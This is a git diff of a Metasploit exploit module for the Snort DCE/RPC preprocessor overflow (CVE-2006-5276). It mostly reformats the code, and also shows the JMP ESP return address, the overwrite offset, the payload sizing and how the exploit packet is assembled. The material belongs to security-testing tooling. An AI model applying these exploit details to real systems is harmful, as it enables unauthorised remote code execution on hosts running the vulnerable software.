diff --git a/modules/exploits/windows/ids/snort_dce_rpc.rb b/modules/exploits/windows/ids/snort_dce_rpc.rb
index a9a3a09b94..3dbd40dde5 100644
--- a/modules/exploits/windows/ids/snort_dce_rpc.rb
+++ b/modules/exploits/windows/ids/snort_dce_rpc.rb
@@ -38,33 +38,37 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'Carsten Maartmann-Moe <carsten@carmaa.com>'
 				],
-			'License' => MSF_LICENSE,
-			'Version' => '$Revision$',
-			'Platform' => 'win',
-			'References' =>
+			'License'		=> MSF_LICENSE,
+			'Version'		=> '$Revision$',
+			'Platform'		=> 'win',
+			'References'	=>
 				[
 					[ 'OSVDB', '67988' ],
 					[ 'CVE', 'CVE-2006-5276' ],
 					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
 				],
-			'Privileged' => true,
-			'Payload' =>
+			'DefaultOptions'	=>
 				{
-					'Space' => 500,
-					'BadChars' => "\x00",
-					'DisableNops' => true,
+					'EXITFUNC'		=> 'thread',
 				},
-			'Targets'	 =>
+			'Payload'	=>
+				{
+					'Space'			=> 390,
+					'BadChars'		=> "\x00",
+					'DisableNops'	=> true,
+				},
+			'Targets'	=>
 				[
 					[ 'Windows Universal',
 						{
-							'Ret' => 0x00407c01,  # JMP ESP snort.exe
-							'Offset' => 0x0121    # The number of bytes before overwrite
+							'Ret'		=> 0x00407c01,	# JMP ESP snort.exe
+							'Offset'	=> 289		# The number of bytes before overwrite
 						}
 					],
 				],
-			'DisclosureDate' => 'Feb 19 2007',
-			'DefaultTarget' => 0))
+			'Privileged'		=> true,
+			'DisclosureDate'	=> 'Feb 19 2007',
+			'DefaultTarget'		=> 0))
 
 		register_options(
 			[
@@ -87,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		capture_sendto(p, rhost)
 
-		# Cleanup
 		handler
 	end
 
@@ -145,14 +148,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		sploit = make_nops(10)
 		sploit << payload.encoded
 
-		# Padding (need to bad the payload with one byte to pass size check)
+		# Padding (to pass size check)
 		sploit << make_nops(1)
 
-		# The size to be included the Write AndX Request #2, including sploit payload
-		size = [(sploit.size() + target['Offset'])].pack('v')
+		# The size to be included in Write AndX Request #2, including sploit payload
+		requestsize = [(sploit.size() + target['Offset'])].pack('v')
 
 		# Assemble the parts into one package
-		p.payload = header << size << tail << eip << sploit
+		p.payload = header << requestsize << tail << eip << sploit
 		p.recalc
 
 		p